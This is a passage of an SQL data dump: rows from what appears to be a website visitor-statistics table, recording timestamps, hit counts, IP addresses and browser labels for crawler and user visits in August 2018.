39.9','other'),(285730,1533901642,1,1,0,0,'141.8.142.74','other'),(285731,1533901733,1,1,0,0,'54.36.148.97','other'),(285732,1533901743,1,1,0,0,'54.36.148.159','other'),(285733,1533901796,1,1,0,0,'54.36.148.99','other'),(285734,1533901833,1,0,1,0,'66.249.66.57',''),(285735,1533902180,1,1,0,0,'54.36.149.0','other'),(285736,1533902236,1,1,0,0,'54.36.148.160','other'),(285737,1533902260,1,1,0,0,'54.36.148.240','other'),(285738,1533902300,3,3,0,0,'91.196.178.172','chrome'),(285739,1533902497,1,1,0,0,'54.36.148.63','other'),(285740,1533902717,1,0,1,0,'66.249.66.157',''),(285741,1533902911,1,1,0,0,'54.36.148.22','other'),(285742,1533903022,1,1,0,0,'54.36.149.60','other'),(285743,1533903084,1,1,0,0,'54.36.149.49','other'),(285744,1533903134,2,1,1,0,'66.249.66.61',''),(285745,1533903254,1,1,0,0,'54.36.149.53','other'),(285746,1533903535,1,1,0,0,'54.36.148.55','other'),(285747,1533903831,1,1,0,0,'54.36.148.249','other'),(285748,1533903908,1,1,0,0,'54.36.148.147','other'),(285749,1533903953,1,1,0,0,'54.36.148.213','other'),(285750,1533904249,2,2,0,0,'141.8.142.74','other'),(285751,1533904253,1,1,0,0,'87.250.224.46','other'),(285752,1533904259,3,3,0,0,'178.154.171.88','other'),(285753,1533904359,1,1,0,0,'91.196.178.169','chrome'),(285754,1533904521,1,1,0,0,'54.36.148.62','other'),(285755,1533904559,1,1,0,0,'54.36.148.53','other'),(285756,1533904736,1,1,0,0,'54.36.148.237','other'),(285757,1533904989,1,1,0,0,'54.36.148.28','other'),(285758,1533905176,1,1,0,0,'54.36.148.146','other'),(285759,1533905459,1,1,0,0,'107.22.24.197','other'),(285760,1533905543,1,1,0,0,'54.36.148.71','other'),(285761,1533905667,1,1,0,0,'207.46.13.115','other'),(285762,1533906183,1,0,1,0,'66.249.66.157',''),(285763,1533906197,1,1,0,0,'54.36.149.25','other'),(285764,1533906315,1,1,0,0,'54.36.148.25','other'),(285765,1533906372,1,1,0,0,'54.36.148.232','other'),(285766,1533906442,1,1,0,0,'54.36.148.173','other'),(285767,1533906596,1,1,0,0,'92.113.189.235','chrome'),(285768,1533906702,1,1,0,0,'91.196.177.46','chrome'),(285769,1533906739,2,2,0,0,'141.8.142.74','other'),(285770,1533906742,1,1,0,0,'54.36.149.93','other'),(285771,1533906851,1,1,0,0,'54.36.148.64','other'),(285772,1533906996,1,1,0,0,'185.220.101.46','other'),(285773,1533907261,1,1,0,0,'54.36.149.74','other'),(285774,1533907289,1,1,0,0,'54.36.148.70','other'),(285775,1533907494,1,1,0,0,'54.36.149.37','other'),(285776,1533907516,1,1,0,0,'178.154.171.88','other'),(285777,1533907579,1,1,0,0,'8.29.198.25','other'),(285778,1533907580,1,1,0,0,'54.36.148.209','other'),(285779,1533907994,1,1,0,0,'54.36.149.64','other'),(285780,1533908025,1,1,0,0,'54.36.148.223','other'),(285781,1533908138,1,1,0,0,'54.36.148.73','other'),(285782,1533908170,1,1,0,0,'91.196.178.100','chrome'),(285783,1533908193,1,1,0,0,'91.214.211.66','chrome'),(285784,1533908328,1,1,0,0,'31.13.122.21','other'),(285785,1533909082,1,1,0,0,'178.154.171.88','other'),(285786,1533909196,1,1,0,0,'54.36.148.216','other'),(285787,1533909314,2,2,0,0,'95.133.194.181','firefox'),(285788,1533909657,1,1,0,0,'8.29.198.25','other'),(285789,1533909659,1,1,0,0,'212.113.42.142','chrome'),(285790,1533909673,1,1,0,0,'141.8.142.74','other'),(285791,1533909858,1,1,0,0,'54.36.149.48','other'),(285792,1533910019,1,1,0,0,'54.36.148.182','other'),(285793,1533910045,1,1,0,0,'54.36.148.54','other'),(285794,1533910072,1,1,0,0,'54.36.149.57','other'),(285795,1533910336,1,1,0,0,'31.13.125.192','other'),(285796,1533910414,1,1,0,0,'178.154.171.88','other'),(285797,1533910541,1,1,0,0,'185.220.101.21','other'),(285798,1533910619,1,0,1,0,'66.249.66.156',''),(285799,1533910624,1,1,0,0,'54.36.148.159','other'),(285800,1533910703,1,1,0,0,'54.36.148.210','other'),(285801,1533911088,1,1,0,0,'54.36.149.10','other'),(285802,1533911173,1,1,0,0,'54.36.148.50','other'),(285803,1533911190,1,1,0,0,'54.36.148.26','other'),(285804,1533911287,1,1,0,0,'54.36.148.132','other'),(285805,1533911353,1,1,0,0,'54.36.148.167','other'),(285806,1533911366,1,1,0,0,'54.36.148.41','other'),(285807,1533911689,1,1,0,0,'54.36.149.94','other'),(285808,1533911779,1,1,0,0,'54.36.149.104','other'),(285809,1533911815,1,1,0,0,'54.36.148.16','other'),(285810,1533911843,1,1,0,0,'54.36.149.54','other'),(285811,1533912272,1,1,0,0,'54.36.148.227','other'),(285812,1533912421,1,1,0,0,'54.36.149.102','other'),(285813,1533912469,1,1,0,0,'207.46.13.115','other'),(285814,1533912746,1,1,0,0,'54.36.148.15','other'),(285815,1533912974,1,1,0,0,'54.36.149.73','other'),(285816,1533913092,1,1,0,0,'54.36.148.53','other'),(285817,1533913690,1,1,0,0,'54.36.149.16','other'),(285818,1533913707,1,1,0,0,'54.36.148.76','other'),(285819,1533914153,1,1,0,0,'62.205.134.182','msie'),(285820,1533914443,1,1,0,0,'54.36.148.124','other'),(285821,1533914513,1,1,0,0,'54.36.149.89','other'),(285822,1533914629,1,1,0,0,'46.211.37.88','other'),(285823,1533914678,1,1,0,0,'54.36.148.50','other'),(285824,1533914762,1,1,0,0,'54.36.149.70','other'),(285825,1533914781,1,1,0,0,'178.154.171.88','other'),(285826,1533914794,1,1,0,0,'141.8.142.74','other'),(285827,1533914967,1,1,0,0,'54.36.148.108','other'),(285828,1533915381,1,1,0,0,'188.230.43.254','other'),(285829,1533915805,1,1,0,0,'54.36.149.35','other'),(285830,1533916449,1,1,0,0,'54.36.148.114','other'),(285831,1533916511,1,1,0,0,'54.36.148.26','other'),(285832,1533916629,2,2,0,0,'178.154.171.88','other'),(285833,1533916633,2,2,0,0,'141.8.142.74','other'),(285834,1533916656,1,1,0,0,'54.36.148.20','other'),(285835,1533916834,1,0,1,0,'66.249.66.156',''),(285836,1533916838,1,1,0,0,'91.196.178.88','chrome'),(285837,1533916904,1,1,0,0,'51.255.65.46','other'),(285838,1533917064,1,1,0,0,'54.36.148.231','other'),(285839,1533917242,1,1,0,0,'54.36.148.121','other'),(285840,1533917315,1,1,0,0,'54.36.148.120','other'),(285841,1533917597,1,1,0,0,'87.250.224.46','other'),(285842,1533917743,1,1,0,0,'185.220.101.12','other'),(285843,1533917780,1,1,0,0,'188.230.43.254','other'),(285844,1533918079,1,1,0,0,'54.36.148.35','other'),(285845,1533918329,1,1,0,0,'54.36.148.33','other'),(285846,1533918418,1,1,0,0,'8.29.198.27','other'),(285847,1533918586,1,1,0,0,'54.36.148.183','other'),(285848,1533918623,1,1,0,0,'54.36.148.190','other'),(285849,1533919168,1,1,0,0,'54.36.148.175','other'),(285850,1533919174,1,1,0,0,'141.8.142.74','other'),(285851,1533919200,1,1,0,0,'54.36.148.194','other'),(285852,1533919549,1,1,0,0,'54.36.149.83','other'),(285853,1533919651,1,1,0,0,'54.36.148.40','other'),(285854,1533919700,1,1,0,0,'54.36.148.165','other'),(285855,1533919722,1,1,0,0,'54.36.148.125','other'),(285856,1533919802,1,1,0,0,'54.36.148.202','other'),(285857,1533920122,2,0,2,0,'66.249.66.157',''),(285858,1533920173,1,1,0,0,'91.196.178.91','chrome'),(285859,1533920179,1,1,0,0,'188.230.43.254','other'),(285860,1533920181,1,1,0,0,'54.36.148.144','other'),(285861,1533920207,1,1,0,0,'157.55.39.244','other'),(285862,1533920497,1,1,0,0,'8.29.198.27','other'),(285863,1533920517,1,1,0,0,'54.36.148.51','other'),(285864,1533920743,1,1,0,0,'54.36.148.229','other'),(285865,1533920807,1,1,0,0,'54.36.148.119','other'),(285866,1533920891,1,1,0,0,'54.36.148.166','other'),(285867,1533920973,1,1,0,0,'54.36.148.97','other'),(285868,1533921180,1,1,0,0,'54.36.148.23','other'),(285869,1533921373,1,1,0,0,'51.15.252.116','other'),(285870,1533921849,1,1,0,0,'54.36.148.244','other'),(285871,1533922207,1,1,0,0,'54.36.149.80','other'),(285872,1533922224,1,1,0,0,'54.36.148.40','other'),(285873,1533922588,1,1,0,0,'188.230.43.254','other'),(285874,1533922989,1,1,0,0,'54.36.148.25','other'),(285875,1533923439,1,1,0,0,'141.8.142.74','other'),(285876,1533923470,1,1,0,0,'178.154.171.88','other'),(285877,1533923516,1,1,0,0,'54.36.149.82','other'),(285878,1533923705,1,1,0,0,'54.36.148.227','other'),(285879,1533924068,1,1,0,0,'176.36.47.220','other'),(285880,1533924095,1,0,1,0,'66.249.66.157',''),(285881,1533924136,1,1,0,0,'54.36.148.178','other'),(285882,1533924380,1,1,0,0,'157.55.39.244','other'),(285883,1533924480,1,1,0,0,'54.36.149.15','other'),(285884,1533924595,1,1,0,0,'54.36.148.174','other'),(285885,1533924801,1,1,0,0,'141.8.142.74','other'),(285886,1533924872,1,1,0,0,'54.36.148.207','other'),(285887,1533924973,1,1,0,0,'176.126.252.12','other'),(285888,1533925006,1,1,0,0,'92.113.189.235','chrome'),(285889,1533925155,1,1,0,0,'178.154.171.88','other'),(285890,1533925358,1,1,0,0,'66.102.9.35','chrome'),(285891,1533925503,2,2,0,0,'46.211.36.159','chrome'),(285892,1533925586,1,0,1,0,'66.249.66.155',''),(285893,1533925652,1,1,0,0,'66.102.9.40','chrome'),(285894,1533925727,1,1,0,0,'54.36.148.150','other'),(285895,1533925780,1,0,1,0,'66.249.66.157',''),(285896,1533925783,1,1,0,0,'54.36.149.7','other'),(285897,1533925829,1,1,0,0,'54.36.148.231','other'),(285898,1533926141,1,1,0,0,'88.135.239.159','chrome'),(285899,1533926163,1,1,0,0,'54.36.148.220','other'),(285900,1533926354,5,5,0,0,'141.8.142.74','other'),(285901,1533926408,1,1,0,0,'178.154.171.88','other'),(285902,1533927200,1,1,0,0,'109.86.71.21','firefox'),(285903,1533927314,1,1,0,0,'54.36.148.145','other'),(285904,1533927594,1,1,0,0,'54.36.149.106','other'),(285905,1533927693,1,1,0,0,'54.36.148.177','other'),(285906,1533927814,1,1,0,0,'54.36.148.99','other'),(285907,1533928112,1,1,0,0,'54.36.148.162','other'),(285908,1533928306,1,1,0,0,'54.36.149.48','other'),(285909,1533928348,1,0,1,0,'66.249.66.156',''),(285910,1533928409,1,0,1,0,'66.249.66.155',''),(285911,1533928441,1,1,0,0,'54.36.148.227','other'),(285912,1533928544,1,1,0,0,'185.220.102.4','other'),(285913,1533928707,1,1,0,0,'54.36.149.54','other'),(285914,1533929025,1,1,0,0,'54.36.148.113','other'),(285915,1533929043,1,1,0,0,'54.36.148.252','other'),(285916,1533929253,1,1,0,0,'8.29.198.27','other'),(285917,1533929300,1,1,0,0,'178.92.136.226','chrome'),(285918,1533929343,1,1,0,0,'54.36.149.94','other'),(285919,1533930072,1,0,1,0,'66.249.66.157',''),(285920,1533930377,1,1,0,0,'37.73.174.20','chrome'),(285921,1533930502,1,1,0,0,'54.36.148.121','other'),(285922,1533930505,2,1,1,0,'66.249.66.57',''),(285923,1533930645,1,1,0,0,'207.46.13.87','other'),(285924,1533930830,1,1,0,0,'54.36.149.7','other'),(285925,1533930896,1,1,0,0,'54.36.148.238','other'),(285926,1533931098,1,1,0,0,'54.36.148.190','other'),(285927,1533931141,1,1,0,0,'180.76.15.151','other'),(285928,1533931328,1,1,0,0,'8.29.198.27','other'),(285929,1533931418,1,1,0,0,'54.36.149.86','other'),(285930,1533931862,1,1,0,0,'207.46.13.115','other'),(285931,1533932136,1,1,0,0,'185.220.101.45','other'),(285932,1533932232,1,0,1,0,'66.249.66.157',''),(285933,1533932234,1,1,0,0,'54.36.148.243','other'),(285934,1533932690,1,1,0,0,'54.36.148.173','other'),(285935,1533932808,1,1,0,0,'178.154.171.88','other'),(285936,1533932819,1,1,0,0,'54.36.148.223','other'),(285937,1533932820,1,1,0,0,'54.36.148.244','other'),(285938,1533933203,1,1,0,0,'54.36.149.92','other'),(285939,1533934021,1,1,0,0,'54.36.148.65','other'),(285940,1533934129,1,1,0,0,'54.36.149.23','other'),(285941,1533934163,1,1,0,0,'54.36.149.30','other'),(285942,1533934204,1,1,0,0,'54.36.149.103','other'),(285943,1533934480,1,1,0,0,'54.36.148.81','other'),(285944,1533934750,1,1,0,0,'54.36.148.67','other'),(285945,1533934859,1,1,0,0,'54.36.149.91','other'),(285946,1533935245,1,1,0,0,'54.36.148.50','other'),(285947,1533935441,1,1,0,0,'54.36.149.23','other'),(285948,1533935449,1,1,0,0,'54.36.148.192','other'),(285949,1533935494,1,1,0,0,'54.36.148.13','other'),(285950,1533936106,1,1,0,0,'54.36.148.54','other'),(285951,1533936297,1,0,1,0,'66.249.66.157',''),(285952,1533936521,1,1,0,0,'54.36.149.47','other'),(285953,1533936618,5,5,0,0,'141.8.142.74','other'),(285954,1533936624,2,2,0,0,'178.154.171.88','other'),(285955,1533936633,1,1,0,0,'87.250.224.46','other'),(285956,1533936972,1,1,0,0,'54.36.148.248','other'),(285957,1533937574,1,0,1,0,'66.249.66.59',''),(285958,1533937909,1,1,0,0,'54.36.148.54','other'),(285959,1533937987,1,1,0,0,'54.36.148.126','other'),(285960,1533938024,1,0,1,0,'66.249.66.61',''),(285961,1533938136,1,1,0,0,'54.36.148.129','other'),(285962,1533938227,1,1,0,0,'95.163.255.92','other'),(285963,1533938231,1,1,0,0,'66.249.66.156','chrome'),(285964,1533938602,1,1,0,0,'54.36.149.47','other'),(285965,1533938680,1,1,0,0,'54.36.148.112','other'),(285966,1533938775,1,1,0,0,'54.36.148.154','other'),(285967,1533939146,1,1,0,0,'54.36.148.151','other'),(285968,1533939209,1,1,0,0,'54.36.148.111','other'),(285969,1533939342,1,1,0,0,'54.36.148.70','other'),(285970,1533939427,1,1,0,0,'180.76.15.11','other'),(285971,1533939753,1,1,0,0,'66.249.66.57','chrome'),(285972,1533939755,1,0,1,0,'66.249.66.59',''),(285973,1533940048,1,1,0,0,'54.36.148.140','other'),(285974,1533940085,1,1,0,0,'8.29.198.25','other'),(285975,1533940569,2,2,0,0,'54.36.148.134','other'),(285976,1533940809,7,7,0,0,'5.9.97.200','other'),(285977,1533940888,1,1,0,0,'54.36.148.16','other'),(285978,1533940889,1,1,0,0,'178.154.200.41','other'),(285979,1533941019,1,1,0,0,'54.36.149.89','other'),(285980,1533941242,1,1,0,0,'54.36.149.44','other'),(285981,1533941710,1,0,1,0,'66.249.66.157',''),(285982,1533941732,1,1,0,0,'54.36.148.100','other'),(285983,1533941781,1,1,0,0,'54.36.149.104','other'),(285984,1533942168,1,1,0,0,'8.29.198.25','other'),(285985,1533942253,1,1,0,0,'66.249.66.57','chrome'),(285986,1533942693,2,2,0,0,'54.36.148.99','other'),(285987,1533942939,1,1,0,0,'94.156.144.239','other'),(285988,1533942965,1,1,0,0,'54.36.149.67','other'),(285989,1533943436,1,1,0,0,'54.36.148.48','other'),(285990,1533943765,1,1,0,0,'54.36.149.7','other'),(285991,1533943901,1,1,0,0,'54.36.148.157','other'),(285992,1533944456,1,1,0,0,'209.90.225.194','chrome'),(285993,1533944770,2,0,2,0,'66.249.66.156',''),(285994,1533945251,1,0,1,0,'66.249.66.157',''),(285995,1533945455,1,1,0,0,'178.154.171.88','other'),(285996,1533945459,2,2,0,0,'141.8.142.74','other'),(285997,1533945605,1,1,0,0,'54.36.148.192','other'),(285998,1533945647,1,1,0,0,'54.36.149.59','other'),(285999,1533945759,1,1,0,0,'54.36.148.22','other'),(286000,1533946080,1,1,0,0,'157.55.39.9','other'),(286001,1533946169,1,1,0,0,'54.36.149.33','other'),(286002,1533946543,1,1,0,0,'178.17.174.198','other'),(286003,1533946626,1,1,0,0,'54.36.148.38','other'),(286004,1533946711,1,1,0,0,'54.36.149.107','other'),(286005,1533946722,1,1,0,0,'54.36.148.230','other'),(286006,1533946760,1,1,0,0,'54.36.148.174','other'),(286007,1533946896,1,1,0,0,'54.36.148.165','other'),(286008,1533947026,1,1,0,0,'78.154.179.30','chrome'),(286009,1533947131,1,1,0,0,'54.36.148.81','other'),(286010,1533947186,1,1,0,0,'54.36.148.154','other'),(286011,1533947240,1,0,1,0,'66.249.66.57',''),(286012,1533947348,1,1,0,0,'87.250.224.46','other'),(286013,1533947423,1,1,0,0,'54.36.148.93','other'),(286014,1533947588,1,1,0,0,'54.36.149.89','other'),(286015,1533947834,1,1,0,0,'54.36.148.235','other'),(286016,1533947861,1,1,0,0,'54.36.149.100','other'),(286017,1533947876,1,1,0,0,'54.36.148.142','other'),(286018,1533948153,4,4,0,0,'178.154.171.88','other'),(286019,1533948163,1,1,0,0,'141.8.142.74','other'),(286020,1533948300,1,1,0,0,'157.55.39.244','other'),(286021,1533948761,1,1,0,0,'54.36.148.246','other'),(286022,1533948820,1,1,0,0,'66.249.66.57','chrome'),(286023,1533949082,1,1,0,0,'54.36.149.31','other'),(286024,1533949253,1,1,0,0,'54.36.148.106','other'),(286025,1533949555,1,1,0,0,'66.249.66.156','chrome'),(286026,1533949960,1,1,0,0,'54.36.148.242','other'),(286027,1533949961,1,1,0,0,'213.180.203.8','other'),(286028,1533950122,1,1,0,0,'62.141.37.236','other'),(286029,1533950220,1,1,0,0,'54.36.148.159','other'),(286030,1533950932,1,1,0,0,'8.29.198.26','other'),(286031,1533951044,1,1,0,0,'54.36.148.136','other'),(286032,1533951075,1,1,0,0,'66.249.66.61','chrome'),(286033,1533951414,1,1,0,0,'54.36.148.111','other'),(286034,1533951952,1,0,1,0,'66.249.66.155',''),(286035,1533951959,1,0,1,0,'66.249.66.59',''),(286036,1533951973,1,1,0,0,'54.36.148.156','other'),(286037,1533952101,1,1,0,0,'54.36.149.8','other'),(286038,1533952180,1,0,1,0,'66.249.66.156',''),(286039,1533952417,1,1,0,0,'66.249.66.157','chrome'),(286040,1533952608,1,1,0,0,'54.36.149.37','other'),(286041,1533953009,1,1,0,0,'8.29.198.27','other'),(286042,1533953432,1,0,1,0,'66.249.66.61',''),(286043,1533953635,2,0,2,0,'66.249.66.59',''),(286044,1533953658,1,0,1,0,'66.249.66.57',''),(286045,1533953716,1,1,0,0,'54.36.149.85','other'),(286046,1533953746,1,1,0,0,'54.36.148.221','other'),(286047,1533953747,1,1,0,0,'141.8.142.74','other'),(286048,1533953752,1,0,1,0,'66.249.66.155',''),(286049,1533953823,1,1,0,0,'54.36.149.24','other'),(286050,1533953839,1,1,0,0,'54.36.148.104','other'),(286051,1533954250,1,1,0,0,'54.36.149.48','other'),(286052,1533954356,1,1,0,0,'54.36.149.87','other'),(286053,1533955172,1,1,0,0,'54.36.149.100','other'),(286054,1533955657,1,1,0,0,'54.36.148.180','other'),(286055,1533955791,1,1,0,0,'66.249.66.61','chrome'),(286056,1533955828,1,1,0,0,'141.8.142.74','other'),(286057,1533955995,1,1,0,0,'54.36.148.214','other'),(286058,1533956630,1,1,0,0,'54.36.149.91','other'),(286059,1533956738,1,1,0,0,'54.36.148.97','other'),(286060,1533956922,1,1,0,0,'54.36.149.59','other'),(286061,1533957197,1,1,0,0,'66.249.66.155','chrome'),(286062,1533957240,1,1,0,0,'54.36.149.99','other'),(286063,1533957248,1,1,0,0,'216.244.66.241','other'),(286064,1533957317,1,0,1,0,'66.249.66.156',''),(286065,1533957333,1,1,0,0,'85.248.227.165','other'),(286066,1533957524,1,1,0,0,'54.36.148.254','other'),(286067,1533957536,1,1,0,0,'37.9.113.110','other'),(286068,1533957688,1,1,0,0,'54.36.149.86','other'),(286069,1533957880,1,1,0,0,'13.66.185.4','other'),(286070,1533958432,1,1,0,0,'54.36.148.168','other'),(286071,1533958534,1,1,0,0,'54.36.148.253','other'),(286072,1533958779,1,1,0,0,'66.249.66.156','chrome'),(286073,1533958854,1,1,0,0,'141.8.142.74','other'),(286074,1533958976,1,1,0,0,'54.36.148.250','other'),(286075,1533959146,1,1,0,0,'54.36.149.18','other'),(286076,1533959833,1,1,0,0,'141.8.142.74','other'),(286077,1533959872,1,1,0,0,'54.36.148.236','other'),(286078,1533960048,1,1,0,0,'54.36.148.31','other'),(286079,1533960244,2,0,2,0,'66.249.66.157',''),(286080,1533960485,1,1,0,0,'54.36.148.146','other'),(286081,1533960658,2,2,0,0,'54.36.149.101','other'),(286082,1533960938,1,1,0,0,'185.220.101.45','other'),(286083,1533961009,1,1,0,0,'54.36.148.34','other'),(286084,1533961091,1,1,0,0,'52.34.24.33','chrome'),(286085,1533961151,1,1,0,0,'180.76.15.30','other'),(286086,1533961331,1,1,0,0,'54.36.148.106','other'),(286087,1533961756,1,1,0,0,'8.29.198.27','other'),(286088,1533961947,1,1,0,0,'54.36.148.120','other'),(286089,1533961985,1,0,1,0,'66.249.66.155',''),(286090,1533962008,1,1,0,0,'54.36.148.12','other'),(286091,1533962066,1,1,0,0,'54.36.149.89','other'),(286092,1533962597,1,1,0,0,'54.36.148.138','other'),(286093,1533962611,1,1,0,0,'54.36.148.175','other'),(286094,1533962783,1,1,0,0,'66.249.66.61','chrome'),(286095,1533963488,1,1,0,0,'54.36.148.248','other'),(286096,1533963574,1,1,0,0,'87.250.224.46','other'),(286097,1533963705,1,1,0,0,'141.8.142.74','other'),(286098,1533963848,1,1,0,0,'8.29.198.26','other'),(286099,1533963933,1,1,0,0,'178.154.171.88','other'),(286100,1533963991,1,1,0,0,'54.36.148.30','other'),(286101,1533964210,1,1,0,0,'54.36.148.183','other'),(286102,1533964270,1,1,0,0,'54.36.148.107','other'),(286103,1533964531,1,0,1,0,'66.249.66.156',''),(286104,1533964608,1,1,0,0,'54.36.148.211','other'),(286105,1533964621,1,1,0,0,'54.36.149.76','other'),(286106,1533964632,1,1,0,0,'157.55.39.9','other'),(286107,1533964812,1,1,0,0,'54.36.148.56','other'),(286108,1533964911,1,1,0,0,'54.36.148.29','other'),(286109,1533964973,1,1,0,0,'54.36.148.179','other'),(286110,1533965086,1,1,0,0,'54.36.148.225','other'),(286111,1533965093,1,1,0,0,'54.36.149.101','other'),(286112,1533965110,1,1,0,0,'54.36.148.73','other'),(286113,1533965132,1,1,0,0,'54.36.148.189','other'),(286114,1533965284,1,1,0,0,'37.9.113.182','other'),(286115,1533965858,1,1,0,0,'54.36.148.70','other'),(286116,1533966021,1,1,0,0,'54.36.148.167','other'),(286117,1533966271,1,1,0,0,'54.36.149.45','other'),(286118,1533966410,1,1,0,0,'95.163.255.99','other'),(286119,1533966483,1,1,0,0,'54.36.149.69','other'),(286120,1533966678,1,1,0,0,'37.73.176.167','chrome'),(286121,1533966853,1,1,0,0,'54.36.148.26','other'),(286122,1533966889,1,1,0,0,'178.154.171.88','other'),(286123,1533967112,1,1,0,0,'54.36.148.206','other'),(286124,1533967201,1,1,0,0,'54.36.148.114','other'),(286125,1533967243,1,1,0,0,'54.36.149.25','other'),(286126,1533967949,1,1,0,0,'216.244.66.241','other'),(286127,1533968064,1,1,0,0,'54.36.148.180','other'),(286128,1533968072,1,1,0,0,'54.36.148.87','other'),(286129,1533968486,1,1,0,0,'54.36.148.103','other'),(286130,1533968687,1,1,0,0,'54.36.148.126','other'),(286131,1533968690,1,1,0,0,'91.196.178.47','chrome'),(286132,1533968718,1,1,0,0,'31.13.113.172','other'),(286133,1533968812,1,0,1,0,'66.249.66.156',''),(286134,1533968835,1,1,0,0,'54.36.148.131','other'),(286135,1533969259,2,0,2,0,'66.249.66.57',''),(286136,1533969331,2,1,1,0,'66.249.66.155',''),(286137,1533969373,564,564,0,0,'176.74.192.36','other'),(286138,1533969523,1,1,0,0,'54.36.148.160','other'),(286139,1533969549,1,1,0,0,'52.53.201.78','chrome'),(286140,1533969768,1,1,0,0,'66.249.66.59','chrome'),(286141,1533969894,1,1,0,0,'141.8.142.74','other'),(286142,1533969940,1,1,0,0,'54.36.148.203','other'),(286143,1533970274,317,317,0,0,'176.74.192.36','other'),(286144,1533970614,1,1,0,0,'54.36.148.101','other'),(286145,1533970822,1,1,0,0,'54.36.148.45','other'),(286146,1533970965,1,1,0,0,'54.36.148.235','other'),(286147,1533971060,1,1,0,0,'216.244.66.241','other'),(286148,1533971333,1,1,0,0,'54.36.148.33','other'),(286149,1533971458,1,1,0,0,'54.36.148.105','other'),(286150,1533971613,2,0,2,0,'66.249.66.155',''),(286151,1533971733,1,1,0,0,'85.248.227.165','other'),(286152,1533971737,1,1,0,0,'54.36.148.233','other'),(286153,1533971973,1,1,0,0,'207.46.13.115','other'),(286154,1533972096,1,1,0,0,'54.36.148.170','other'),(286155,1533972099,2,0,2,0,'66.249.66.157',''),(286156,1533972531,1,1,0,0,'54.36.148.193','other'),(286157,1533972576,1,1,0,0,'8.29.198.27','other'),(286158,1533972805,1,1,0,0,'178.154.171.88','other'),(286159,1533972910,3,3,0,0,'54.162.171.242','other'),(286160,1533972940,1,1,0,0,'54.36.148.148','other'),(286161,1533972943,2,2,0,0,'54.165.59.7','other'),(286162,1533973334,1,1,0,0,'87.250.224.46','other'),(286163,1533973640,1,1,0,0,'54.36.149.25','other'),(286164,1533973722,1,1,0,0,'66.249.66.59','chrome'),(286165,1533973739,1,1,0,0,'178.154.171.88','other'),(286166,1533973795,1,1,0,0,'54.36.149.63','other'),(286167,1533974124,1,1,0,0,'54.36.149.29','other'),(286168,1533974556,1,1,0,0,'62.205.134.182','msie'),(286169,1533974682,1,1,0,0,'8.29.198.25','other'),(286170,1533974809,1,1,0,0,'54.36.148.95','other'),(286171,1533974992,1,1,0,0,'54.36.148.75','other'),(286172,1533975026,1,1,0,0,'54.36.148.131','other'),(286173,1533975094,1,1,0,0,'178.154.171.88','other'),(286174,1533975326,1,1,0,0,'185.107.47.171','other'),(286175,1533975352,1,1,0,0,'54.36.149.54','other'),(286176,1533975421,3,3,0,0,'54.165.59.7','other'),(286177,1533975853,1,0,1,0,'66.249.66.156',''),(286178,1533976317,1,1,0,0,'54.36.148.141','other'),(286179,1533976688,1,1,0,0,'54.36.148.105','other'),(286180,1533976794,1,1,0,0,'178.154.200.41','other'),(286181,1533976877,1,1,0,0,'92.113.189.235','chrome'),(286182,1533976893,1,1,0,0,'54.36.149.20','other'),(286183,1533977018,1,1,0,0,'54.36.148.248','other'),(286184,1533977021,1,1,0,0,'85.10.207.195','other'),(286185,1533977150,1,1,0,0,'216.244.66.241','other'),(286186,1533977223,1,1,0,0,'54.36.148.72','other'),(286187,1533977272,2,2,0,0,'95.133.194.181','firefox'),(286188,1533977347,1,1,0,0,'54.162.171.242','other'),(286189,1533977365,1,0,1,0,'66.249.66.61',''),(286190,1533977373,1,1,0,0,'66.249.66.157','chrome'),(286191,1533977406,1,1,0,0,'66.249.66.57','chrome'),(286192,1533977521,2,2,0,0,'54.36.148.249','other'),(286193,1533978216,25,25,0,0,'5.9.144.234','other'),(286194,1533978298,1,1,0,0,'54.36.148.104','other'),(286195,1533978450,1,1,0,0,'216.244.66.241','other'),(286196,1533978685,1,1,0,0,'62.205.134.182','msie'),(286197,1533978770,1,1,0,0,'54.165.59.7','other'),(286198,1533978942,1,1,0,0,'185.220.102.7','other'),(286199,1533979152,1,1,0,0,'54.36.148.176','other'),(286200,1533979434,1,1,0,0,'141.8.142.74','other'),(286201,1533979579,1,1,0,0,'54.36.148.33','other'),(286202,1533980078,1,1,0,0,'54.36.149.45','other'),(286203,1533980213,1,1,0,0,'54.36.149.41','other'),(286204,1533980571,1,1,0,0,'141.8.142.74','other'),(286205,1533980660,1,1,0,0,'54.36.148.33','other'),(286206,1533980930,1,1,0,0,'54.36.149.10','other'),(286207,1533981216,33,33,0,0,'38.132.124.227','other'),(286208,1533981674,1,1,0,0,'54.36.148.167','other'),(286209,1533981734,1,1,0,0,'54.36.149.66','other'),(286210,1533982030,1,1,0,0,'54.36.148.89','other'),(286211,1533982039,1,1,0,0,'54.36.148.134','other'),(286212,1533982042,1,1,0,0,'54.36.149.79','other'),(286213,1533982084,1,1,0,0,'54.36.149.86','other'),(286214,1533982192,1,1,0,0,'54.36.148.56','other'),(286215,1533982210,1,1,0,0,'54.36.148.75','other'),(286216,1533982575,1,1,0,0,'66.249.66.157','chrome'),(286217,1533982585,1,1,0,0,'66.249.66.57','chrome'),(286218,1533982917,1,1,0,0,'54.36.148.14','other'),(286219,1533982941,1,1,0,0,'54.36.148.137','other'),(286220,1533983245,1,1,0,0,'207.241.229.148','other'),(286221,1533983256,1,1,0,0,'62.205.134.182','msie'),(286222,1533983402,1,1,0,0,'8.29.198.25','other'),(286223,1533984082,1,0,1,0,'66.249.66.157',''),(286224,1533984304,1,1,0,0,'54.36.149.31','other'),(286225,1533984618,1,1,0,0,'54.36.149.69','other'),(286226,1533984652,1,1,0,0,'54.36.148.97','other'),(286227,1533984773,1,1,0,0,'141.8.142.74','other'),(286228,1533984795,1,1,0,0,'54.36.148.209','other'),(286229,1533984862,1,1,0,0,'87.250.224.46','other'),(286230,1533985278,1,1,0,0,'54.36.148.161','other'),(286231,1533985519,1,1,0,0,'8.29.198.25','other'),(286232,1533986074,1,1,0,0,'178.154.171.88','other'),(286233,1533986142,1,1,0,0,'185.220.101.28','other'),(286234,1533986225,1,1,0,0,'66.249.66.156','chrome'),(286235,1533986229,1,1,0,0,'66.249.66.57','chrome'),(286236,1533986717,1,1,0,0,'141.8.142.74','other'),(286237,1533986780,1,1,0,0,'54.36.148.202','other'),(286238,1533987123,1,1,0,0,'91.209.11.236','other'),(286239,1533987337,1,1,0,0,'54.36.148.201','other'),(286240,1533987372,1,1,0,0,'54.36.148.47','other'),(286241,1533987600,1,1,0,0,'54.36.149.77','other'),(286242,1533987670,1,1,0,0,'141.8.142.74','other'),(286243,1533988020,1,1,0,0,'54.36.149.50','other'),(286244,1533988280,1,1,0,0,'54.36.148.87','other'),(286245,153398